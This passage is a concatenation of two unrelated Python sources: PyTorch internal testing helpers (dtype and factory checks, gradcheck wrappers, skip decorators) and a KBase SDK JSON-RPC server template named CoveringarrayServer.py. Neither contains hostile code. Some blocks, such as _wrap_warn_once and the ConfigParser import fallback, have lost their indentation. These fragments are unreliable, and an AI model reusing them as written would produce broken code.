        icoords.append(i)
        jcoords.append(j)
        values.append(v)
    indices_tensor = torch.tensor([icoords, jcoords])
    return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
    """For each dtype (float16 excluded), check torch.zeros honors the
    requested dtype, layout and device."""
    for dt in dtypes:
        if dt == torch.float16:
            continue
        z = torch.zeros((2, 3), dtype=dt, layout=layout, device=device)
        self.assertIs(dt, z.dtype)
        self.assertIs(layout, z.layout)
        self.assertEqual(device, z.device)
def do_test_empty_full(self, dtypes, layout, device):
    """Exhaustively exercise the empty/full tensor factory family
    (torch.empty/full, *_like, new_empty/new_full) across the given dtypes,
    checking shape, dtype, layout, requires_grad, device, and fill value."""
    shape = torch.Size([2, 3])
    def check_value(tensor, dtype, layout, device, value, requires_grad):
        # Core assertion helper; `value` is None for empty-style factories
        # (contents unspecified), otherwise the expected fill value.
        self.assertEqual(shape, tensor.shape)
        self.assertIs(dtype, tensor.dtype)
        self.assertIs(layout, tensor.layout)
        self.assertEqual(tensor.requires_grad, requires_grad)
        # Device is only checked for CUDA tensors (CPU comparisons would be
        # vacuous with the -1 placeholder passed below).
        if tensor.is_cuda and device is not None:
            self.assertEqual(device, tensor.device)
        if value is not None:
            fill = tensor.new(shape).fill_(value)
            self.assertEqual(tensor, fill)
    def get_int64_dtype(dtype):
        # Map a dtype to the int64 of the same namespace (e.g. torch.int64).
        module = '.'.join(str(dtype).split('.')[1:-1])
        if not module:
            return torch.int64
        return operator.attrgetter(module)(torch).int64
    default_dtype = torch.get_default_dtype()
    # Baseline: default dtype/strided factories; -1 is a placeholder device.
    check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
    check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
    for dtype in dtypes:
        # requires_grad=True is only legal for floating dtypes, hence the set.
        for rg in {dtype.is_floating_point, False}:
            int64_dtype = get_int64_dtype(dtype)
            v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
            check_value(v, dtype, layout, device, None, rg)
            out = v.new()
            check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
                        dtype, layout, device, None, rg)
            check_value(v.new_empty(shape), dtype, layout, device, None, False)
            check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
                        int64_dtype, layout, device, None, False)
            check_value(torch.empty_like(v), dtype, layout, device, None, False)
            check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
                        int64_dtype, layout, device, None, False)
            # full-style factories are skipped for fp16 and sparse layouts.
            if dtype is not torch.float16 and layout != torch.sparse_coo:
                fv = 3
                v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
                check_value(v, dtype, layout, device, fv, rg)
                check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
                out = v.new()
                check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
                            dtype, layout, device, fv + 2, rg)
                check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
                            int64_dtype, layout, device, fv + 3, False)
                check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
                check_value(torch.full_like(v, fv + 5,
                            dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
                            int64_dtype, layout, device, fv + 5, False)
def clone_input_helper(input):
    """Recursively clone the tensor-type inputs of operators tested by OpInfo.

    Tensors are cloned; sequences are rebuilt as tuples of recursively cloned
    elements; any other value is returned unchanged.
    """
    if isinstance(input, torch.Tensor):
        return input.clone()
    if isinstance(input, Sequence):
        return tuple(clone_input_helper(item) for item in input)
    return input
# Test names known to run far too slowly; harnesses consult this set to
# exclude them from certain configurations.
THESE_TAKE_WAY_TOO_LONG = {
    'test_Conv3d_groups',
    'test_conv_double_backward',
    'test_conv_double_backward_groups',
    'test_Conv3d_dilated',
    'test_Conv3d_stride_padding',
    'test_Conv3d_dilated_strided',
    'test_Conv3d',
    'test_Conv2d_dilated',
    'test_ConvTranspose3d_dilated',
    'test_ConvTranspose2d_dilated',
    'test_snli',
    'test_Conv2d',
    'test_Conv2d_padding',
    'test_ConvTranspose2d_no_bias',
    'test_ConvTranspose2d',
    'test_ConvTranspose3d',
    'test_Conv2d_no_bias',
    'test_matmul_4d_4d',
    'test_multinomial_invalid_probs',
}
# Absolute path of the test script being executed, or None if unknown.
running_script_path = None
def set_running_script_path():
    """Record the absolute, resolved path of the currently running script."""
    global running_script_path
    try:
        script = os.path.abspath(os.path.realpath(sys.argv[0]))
        # Only remember real .py scripts (skip e.g. interactive sessions).
        if script.endswith('.py'):
            running_script_path = script
    except Exception:
        pass
def check_test_defined_in_running_script(test_case):
    """Assert that `test_case`'s class is defined in the script being run,
    catching accidental cross-file TestCase imports."""
    if running_script_path is None:
        return
    defining_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
    assert defining_file == running_script_path, "Class of loaded TestCase \"{}\" " \
        "is not defined in the running script \"{}\", but in \"{}\". Did you " \
        "accidentally import a unittest.TestCase from another file?".format(
            test_case.id(), running_script_path, defining_file)
def load_tests(loader, tests, pattern):
    """unittest `load_tests` hook: flatten the discovered groups into one
    suite, verifying each test's defining file along the way."""
    set_running_script_path()
    suite = unittest.TestSuite()
    for group in tests:
        for case in group:
            check_test_defined_in_running_script(case)
            suite.addTest(case)
    return suite
class BytesIOContext(io.BytesIO):
    """An io.BytesIO usable in a `with` block that is NOT closed on exit,
    so its contents remain readable afterwards."""
    def __enter__(self):
        return self

    def __exit__(self, *args):
        pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
# Pass as gradcheck(..., nondet_tol=GRADCHECK_NONDET_TOL).
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
    """Testing-internal wrapper around torch.autograd.gradcheck.

    Enables newer checks (batched-grad and fast mode) by default so they are
    exercised by the test suite, while the public-facing API keeps them off
    to avoid breaking user code.  All PyTorch devs doing testing should use
    this wrapper instead of autograd.gradcheck.

    A keyword explicitly passed as None is replaced by the default here.
    """
    default_values = {
        "check_batched_grad": True,
        "fast_mode": True,
    }
    # Fixed typo in the env default: "OFF" (was "0FF"); only "ON" matters.
    if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
        default_values["fast_mode"] = False
    for key, value in default_values.items():
        # default value override values explicitly set to None
        k = kwargs.get(key, None)
        kwargs[key] = k if k is not None else value
    return torch.autograd.gradcheck(fn, inputs, **kwargs)
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
    """Testing-internal wrapper around torch.autograd.gradgradcheck.

    See `gradcheck` above for why this wrapper exists: it turns on
    batched-grad checking and fast mode by default for the test suite.
    All PyTorch devs doing testing should use this wrapper instead of
    autograd.gradgradcheck.
    """
    default_values = {
        "check_batched_grad": True,
        "fast_mode": True,
    }
    # Fixed typo in the env default: "OFF" (was "0FF"); only "ON" matters.
    if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
        default_values["fast_mode"] = False
    for key, value in default_values.items():
        # default value override values explicitly set to None
        k = kwargs.get(key, None)
        kwargs[key] = k if k is not None else value
    return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
    # Assert (rather than return a bool) so a failure reports whether the
    # first-order or second-order check is the one that broke.
    for checker in (gradcheck, gradgradcheck):
        test_case.assertTrue(checker(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
    """Temporarily chdir into `path`, restoring the previous cwd on exit."""
    saved = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(saved)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
# Maps dtype -> default comparison tolerance used by legacy NN tests.
dtype2prec_DONTUSE = {torch.float: 1e-5,
                      torch.double: 1e-5,
                      torch.half: 1e-2,
                      torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# Wraps a sparse-tensor test so it runs twice: first with coalesced=True,
# then with coalesced=False.
def coalescedonoff(f):
    @wraps(f)
    def wrapped(self, *args, **kwargs):
        for coalesced in (True, False):
            f(self, *args, **kwargs, coalesced=coalesced)
    return wrapped
@contextlib.contextmanager
def disable_gc():
    """Context manager: switch the garbage collector off for the duration,
    re-enabling it afterwards (no-op if it was already disabled)."""
    if not gc.isenabled():
        yield
        return
    try:
        gc.disable()
        yield
    finally:
        gc.enable()
def find_library_location(lib_name: str) -> Path:
    """Locate a shared library: prefer the installed torch/lib/ folder,
    falling back to the source checkout's build/lib/ directory."""
    installed = Path(torch.__file__).resolve().parent / 'lib' / lib_name
    if os.path.exists(installed):
        return installed
    repo_root = Path(__file__).resolve().parent.parent.parent
    return repo_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
    """
    Similar to unittest.skip, however in the sandcastle environment it just
    "passes" the test instead to avoid creating tasks complaining about tests
    skipping continuously.
    """
    def decorator(func):
        if IS_SANDCASTLE:
            # On sandcastle: run a stub that notes the skip on stderr and passes.
            @wraps(func)
            def wrapper(*args, **kwargs):
                print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
                return
            return wrapper
        # Everywhere else: mark the test as a regular unittest skip.
        func.__unittest_skip__ = True
        func.__unittest_skip_why__ = reason
        return func
    return decorator
def mock_wrapper(method):
    """
    Returns a function that calls the real implementation of a method
    in addition to passing args to a mock object.
    """
    recorder = MagicMock()
    @wraps(method)
    def wrapper(self, *args, **kwargs):
        # Record the call (without self), then delegate to the real method.
        recorder(*args, **kwargs)
        return method(self, *args, **kwargs)
    wrapper.mock = recorder  # type: ignore[attr-defined]
    return wrapper
def get_tensors_from(args, kwargs):
    """ Returns a set of all Tensor objects in the given args and kwargs. """
    tensors = {a for a in args if isinstance(a, Tensor)}
    tensors.update(v for v in kwargs.values() if isinstance(v, Tensor))
    return tensors
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
    """Reinterpret the raw byte values in *byte_list* (native byte order, as
    ctypes.from_buffer uses the platform's layout) as a single value of
    *dtype* and return it as a scalar tensor on *device*.  Complex dtypes
    consume two component-sized chunks: real part first, then imaginary."""
    dtype_to_ctype: Dict[torch.dtype, Any] = {
        torch.int8: ctypes.c_int8,
        torch.uint8: ctypes.c_uint8,
        torch.int16: ctypes.c_int16,
        torch.int32: ctypes.c_int32,
        torch.int64: ctypes.c_int64,
        torch.bool: ctypes.c_bool,
        torch.float32: ctypes.c_float,
        torch.complex64: ctypes.c_float,
        torch.float64: ctypes.c_double,
        torch.complex128: ctypes.c_double,
    }
    ctype = dtype_to_ctype[dtype]
    num_bytes = ctypes.sizeof(ctype)

    def decode(chunk):
        # Validate each raw byte, then reinterpret the buffer as one ctype value.
        for byte in chunk:
            assert 0 <= byte <= 255
        return ctype.from_buffer((ctypes.c_byte * num_bytes)(*chunk)).value

    if dtype.is_complex:
        assert len(byte_list) == (num_bytes * 2)
        value = decode(byte_list[:num_bytes]) + 1j * decode(byte_list[num_bytes:])
    else:
        assert len(byte_list) == num_bytes
        value = decode(byte_list)
    return torch.tensor(value, device=device, dtype=dtype)
def has_breakpad():
    """Return True if the breakpad crash handler is linked into this build."""
    # We always build with breakpad in CI
    if IS_IN_CI:
        return True
    # If not on a special build, check that the library was actually linked in
    try:
        torch._C._get_minidump_directory()  # type: ignore[attr-defined]
    except RuntimeError as e:
        # The spelling below (including the typo) must match the message the
        # C++ side raises when breakpad is linked but not yet initialized.
        return "Minidump handler is uninintialized" in str(e)
    return True
def sandcastle_skip_if(condition, reason):
    """
    Similar to unittest.skipIf, however in the sandcastle environment it just
    "passes" the test instead to avoid creating tasks complaining about tests
    skipping continuously.
    """
    def decorator(func):
        # Outside sandcastle a true condition means a regular unittest skip.
        if condition and not IS_SANDCASTLE:
            func.__unittest_skip__ = True
            func.__unittest_skip_why__ = reason
            return func
        # On sandcastle (or when the condition is false) wrap the test: it
        # either logs-and-passes, or runs normally.
        @wraps(func)
        def wrapper(*args, **kwargs):
            if IS_SANDCASTLE and condition:
                print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
                return
            return func(*args, **kwargs)
        return wrapper
    return decorator
def dtype_name(dtype):
    """ Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
    # str(dtype) looks like "torch.<name>"; keep everything after the dot.
    return str(dtype).partition('.')[2]
def set_single_threaded_if_parallel_tbb(fn):
    """Set test to be single threaded for parallel tbb.
    See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
    """
    if not IS_TBB:
        return fn
    @wraps(fn)
    def wrap_fn(*args, **kwargs):
        # Force a single thread for the duration of the call, restoring the
        # previous count afterwards.
        saved = torch.get_num_threads()
        torch.set_num_threads(1)
        try:
            return fn(*args, **kwargs)
        finally:
            torch.set_num_threads(saved)
    return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
    """Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
    """
    def measure() -> float:
        # Time how long torch.cuda._sleep(1e6) takes with CUDA events.
        begin = torch.cuda.Event(enable_timing=True)
        finish = torch.cuda.Event(enable_timing=True)
        begin.record()
        torch.cuda._sleep(1000000)
        finish.record()
        finish.synchronize()
        return 1000000 / begin.elapsed_time(finish)
    # Get 10 values and remove the 2 max and 2 min and return the avg.
    # This is to avoid system disturbance that skew the results, e.g.
    # the very first cuda call likely does a bunch of init, which takes
    # much longer than subsequent calls.
    #
    # Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
    # and seems to return stable values. Therefore, we enable caching
    # using lru_cache decorator above.
    num = 10
    samples = sorted(measure() for _ in range(num))
    return mean(samples[2 : num - 2])
|
CoveringarrayServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Coveringarray.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'  # env var: path to the deployment config file
SERVICE = 'KB_SERVICE_NAME'  # env var: config section / service name
AUTH = 'auth-service-url'  # config key: KBase auth service URL
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
    """Path of the deployment config file from $KB_DEPLOYMENT_CONFIG, or None."""
    return environ.get(DEPLOY)
def get_service_name():
    """Service name from $KB_SERVICE_NAME, or None when unset."""
    return environ.get(SERVICE)
def get_config():
    """Parse the deployment config into a plain dict (None if no file is configured)."""
    cfg_file = get_config_file()
    if not cfg_file:
        return None
    parser = ConfigParser()
    parser.read(cfg_file)
    section = get_service_name() or 'Coveringarray'
    return {name: value for name, value in parser.items(section)}
# Load the deployment configuration once at import time, then instantiate the
# service implementation with it (the import is deferred until after config
# parsing so the implementation can rely on module-level `config`).
config = get_config()
from Coveringarray.CoveringarrayImpl import Coveringarray  # noqa @IgnorePep8
impl_Coveringarray = Coveringarray(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that also handles sets, frozensets, and any object
    exposing a ``toJSONable()`` method."""
    def default(self, obj):
        if isinstance(obj, (set, frozenset)):
            return list(obj)
        if hasattr(obj, 'toJSONable'):
            return obj.toJSONable()
        return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSON-RPC service that passes a per-call context object (``ctx``) as
    the first argument of every registered method, on top of jsonrpcbase's
    standard dispatch.  Incoming request data is expected to be already
    deserialized (a dict or a list of dicts), not a raw JSON string.
    """
    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.
        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)
        return None
    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
                # The "- 1" accounts for the ctx argument, which is supplied
                # by the server rather than by the caller's param list.
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')
                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.
                # NOTE: jsonrpcbase stores the protocol version as an int
                # (1.1 -> 11), hence the comparison with 11.
                if request['jsonrpc'] < 11:
                    raise KeywordError
                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            # Protocol-level errors propagate unchanged.
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            # Wrap any implementation error in a ServerError carrying the
            # traceback so it can be reported to the client.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if len(e.args) == 1:
                newerr.data = repr(e.args[0])
            else:
                newerr.data = repr(e.args)
            raise newerr
        return result
    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.
        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        # try:
        #     rdata = json.loads(jsondata)
        # except ValueError:
        #     raise ParseError
        # set some default values for error handling
        request = self._get_default_vals()
        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)
            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch.
            # Parse all requests first so a malformed entry fails the whole
            # batch before any method is executed.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)
            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)
            if responds:
                return responds
            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError
    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        if 'types' in self.method_data[request['method']]:
            self._validate_params_types(request['method'], request['params'])
        result = self._call_method(ctx, request)
        # Do not respond to notifications.
        if request['id'] is None:
            return None
        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']
        return respond
class MethodContext(dict):
    """Per-call context passed as the first argument to service methods.

    Behaves as a plain dict of call metadata (client_ip, user_id, token,
    module/method/call_id, provenance, ...) plus logging helpers bound to
    the server's logger.
    """
    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Log levels (numeric or symbolic) that log_debug passes through as-is.
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger
    def log_err(self, message):
        self._log(log.ERR, message)
    def log_info(self, message):
        self._log(log.INFO, message)
    def log_debug(self, message, level=1):
        # Accept a known debug level verbatim, or a relative level 1..3
        # which is mapped onto levels 7..9 (the entries in _debug_levels).
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
        self._log(level, message)
    def set_log_level(self, level):
        self._logger.set_log_level(level)
    def get_log_level(self):
        return self._logger.get_log_level()
    def clear_log_level(self):
        self._logger.clear_user_log_level()
    def _log(self, level, message):
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])
    def provenance(self):
        # If a callback server is available (SDK_CALLBACK_URL set), query it
        # for provenance; otherwise fall back to the locally stored value.
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                # A 500 with a JSON body carries a structured JSON-RPC error;
                # anything else is surfaced as an opaque ServerError.
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        super(Exception, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message or ''
        # data = JSON RPC 2.0, error = 1.1
        self.data = data or error or ''

    def __str__(self):
        return (self.name + ': ' + str(self.code) + '. ' + self.message +
                '\n' + self.data)
def getIPAddress(environ):
    """Best-effort client IP: X-Forwarded-For (first hop), then X-Real-IP,
    then REMOTE_ADDR.  Proxy headers are ignored when the config sets
    dont_trust_x_ip_headers to 'true'."""
    forwarded = environ.get('HTTP_X_FORWARDED_FOR')
    real_ip = environ.get('HTTP_X_REAL_IP')
    trust_x_headers = config is None or \
        config.get('dont_trust_x_ip_headers') != 'true'
    if trust_x_headers:
        if forwarded:
            return forwarded.split(',')[0].strip()
        if real_ip:
            return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over
    def logcallback(self):
        # Keep the server log pointed at the same file as the user log
        # whenever the user log's file changes.
        self.serverlog.set_log_file(self.userlog.get_log_file())
    def log(self, level, context, message):
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])
    def __init__(self):
        submod = get_service_name() or 'Coveringarray'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        # Maps method name -> 'required' / 'optional' / (absent -> 'none').
        self.method_authentication = dict()
        self.rpc_service.add(impl_Coveringarray.run_Coveringarray,
                             name='Coveringarray.run_Coveringarray',
                             types=[dict])
        self.method_authentication['Coveringarray.run_Coveringarray'] = 'required'  # noqa
        self.rpc_service.add(impl_Coveringarray.status,
                             name='Coveringarray.status',
                             types=[dict])
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)
    def __call__(self, environ, start_response):
        # WSGI entry point: decode the JSON-RPC request, authenticate if the
        # method requires it, dispatch, and serialize the result or error.
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        status = '500 Internal Server Error'
        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
                                'Authentication required for ' +
                                'Coveringarray ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception as e:
                                # An invalid token only fails the call when
                                # authentication is required.
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())
        # print('Request method was %s\n' % environ['REQUEST_METHOD'])
        # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
        # print('Request body was: %s' % request_body)
        # print('Result from the method call is:\n%s\n' % \
        #    pprint.pformat(rpc_result))
        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''
        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body.encode('utf8')]
    def process_error(self, error, context, request, trace=None):
        # Attach ids/version info from the request to the error structure and
        # serialize it.  Where the trace is stored depends on the protocol
        # version the request declared.
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])
        if 'id' in request:
            error['id'] = request['id']
        if 'version' in request:
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            error['version'] = '1.0'
            error['error']['error'] = trace
        return json.dumps(error)
    def now_in_utc(self):
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
    # NOTE(review): config values come from ConfigParser and are strings, so
    # a value of 'false' is still truthy here — verify whether this should
    # compare against 'true' like getIPAddress() does.
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print("Monkeypatching std libraries for async")
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass
# Handle of the background server process started by start_server(newprocess=True).
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Excecution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    # Resolve the actual port (meaningful when port=0 asks the OS to pick one).
    port = httpd.server_address[1]
    print("Listening on port %s" % port)
    if not newprocess:
        # Blocks until interrupted.
        httpd.serve_forever()
    else:
        _proc = Process(target=httpd.serve_forever)
        _proc.daemon = True
        _proc.start()
    return port
def stop_server():
